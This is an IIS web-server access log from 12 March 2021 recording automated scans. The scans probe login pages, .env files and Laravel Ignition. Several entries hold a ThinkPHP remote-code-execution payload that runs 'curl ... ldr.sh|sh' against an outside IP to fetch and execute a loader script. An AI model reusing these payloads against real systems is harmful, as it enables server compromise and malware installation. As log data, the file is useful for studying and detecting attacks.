#Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 00:59:19 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 00:59:19 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 453 2021-03-12 01:08:46 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 359 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 02:02:09 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 02:02:09 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 628 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 02:18:40 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 02:18:40 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 203 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 03:04:55 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 03:04:55 192.168.0.14 GET /boaform/admin/formLogin username=user&psd=user 80 - 192.168.0.1 - - 404 0 2 562 2021-03-12 03:12:37 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 234 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 03:47:34 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 03:47:34 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 437 2021-03-12 03:47:34 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 250 2021-03-12 03:47:34 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 234 2021-03-12 03:47:36 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 234 2021-03-12 03:47:36 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 250 2021-03-12 03:47:36 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 250 2021-03-12 03:47:37 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 234 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 04:12:05 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 04:12:05 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 390 2021-03-12 04:12:05 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 203 2021-03-12 04:12:05 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 203 2021-03-12 04:12:06 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 171 2021-03-12 04:12:06 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 203 2021-03-12 04:12:06 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 203 2021-03-12 04:12:08 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 203 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 10:46:36 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 10:46:36 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 468 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 12:30:13 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 12:30:13 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 531 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 13:38:30 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 13:38:30 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 468 2021-03-12 13:38:30 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 281 2021-03-12 13:38:31 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 281 2021-03-12 13:38:31 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 281 2021-03-12 13:38:32 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 281 2021-03-12 13:38:32 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 281 2021-03-12 13:38:33 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 281 2021-03-12 13:39:08 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 265 2021-03-12 13:39:09 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 218 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 14:09:07 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 14:09:07 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0 - 200 0 0 500 2021-03-12 14:13:41 192.168.0.14 GET /hudson - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 312 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 14:34:53 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 14:34:53 192.168.0.14 GET /manager/text/list - 80 - 192.168.0.1 Mozilla/5.0+zgrab/0.x - 404 0 2 515 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 15:05:52 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 15:05:52 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 671 2021-03-12 15:20:21 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 359 2021-03-12 15:20:22 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 343 2021-03-12 15:20:22 192.168.0.14 GET /core/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 359 2021-03-12 15:20:24 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 328 2021-03-12 15:20:24 192.168.0.14 GET /app/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 406 2021-03-12 15:20:26 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 312 2021-03-12 15:20:27 192.168.0.14 GET /public/.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 359 2021-03-12 15:20:27 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 312 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 17:19:32 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 17:19:32 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 562 2021-03-12 17:27:42 192.168.0.14 POST /boaform/admin/formLogin - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 http://14.139.109.23:80/admin/login.asp 404 0 2 296 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 18:00:30 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 18:00:30 192.168.0.14 GET /TP/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 140 2021-03-12 18:00:31 192.168.0.14 GET /TP/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 46 2021-03-12 18:00:33 192.168.0.14 GET /thinkphp/html/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 46 2021-03-12 18:00:34 192.168.0.14 GET /html/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 62 2021-03-12 18:00:35 192.168.0.14 GET /public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 46 2021-03-12 18:00:36 192.168.0.14 GET /TP/html/public/index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 62 2021-03-12 18:00:38 192.168.0.14 GET /elrekt.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 46 2021-03-12 18:00:40 192.168.0.14 GET /index.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 404 0 2 62 2021-03-12 18:00:44 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;en-US;+rv:1.9.2)+Gecko/20100115+Firefox/3.6) - 200 0 0 171 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 18:25:48 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 18:25:48 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 593 2021-03-12 18:29:16 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 281 2021-03-12 18:29:16 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 281 2021-03-12 18:29:17 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 281 2021-03-12 18:29:17 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 296 2021-03-12 18:29:19 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 296 2021-03-12 18:29:19 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 281 2021-03-12 18:29:21 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 281 2021-03-12 18:42:58 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/601.7.7+(KHTML,+like+Gecko)+Version/9.1.2+Safari/601.7.7 - 200 0 0 281 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 20:05:20 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 20:05:20 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 360 2021-03-12 20:05:20 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 78 2021-03-12 20:05:20 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 78 2021-03-12 20:05:20 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 93 2021-03-12 20:05:20 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 78 2021-03-12 20:05:20 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 78 2021-03-12 20:05:21 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 78 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 20:36:28 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 20:36:28 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/51.0.2704.103+Safari/537.36 - 200 0 0 515 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 21:29:01 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 21:29:01 192.168.0.14 GET /login - 80 - 192.168.0.1 - - 404 0 2 375 2021-03-12 21:29:01 192.168.0.14 GET /jenkins/login - 80 - 192.168.0.1 - - 404 0 2 187 2021-03-12 21:29:01 192.168.0.14 GET /manager/html - 80 - 192.168.0.1 Go-http-client/1.1 - 404 0 2 187 2021-03-12 21:29:02 192.168.0.14 GET /wp-login.php - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 171 2021-03-12 21:29:02 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 187 2021-03-12 21:29:02 192.168.0.14 GET / s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=curl+--user-agent+curl_tp5+http://31.210.20.181/ldr.sh|sh 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 187 2021-03-12 21:29:03 192.168.0.14 POST /_ignition/execute-solution - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 404 0 2 181 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 23:09:40 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 23:09:40 192.168.0.14 GET / - 80 - 192.168.0.1 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.116+Safari/537.36 - 200 0 0 734 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2021-03-12 23:41:10 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2021-03-12 23:41:10 192.168.0.14 GET /.env - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 404 0 2 312 2021-03-12 23:41:11 192.168.0.14 POST / - 80 - 192.168.0.1 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/81.0.4044.129+Safari/537.36 - 405 0 1 296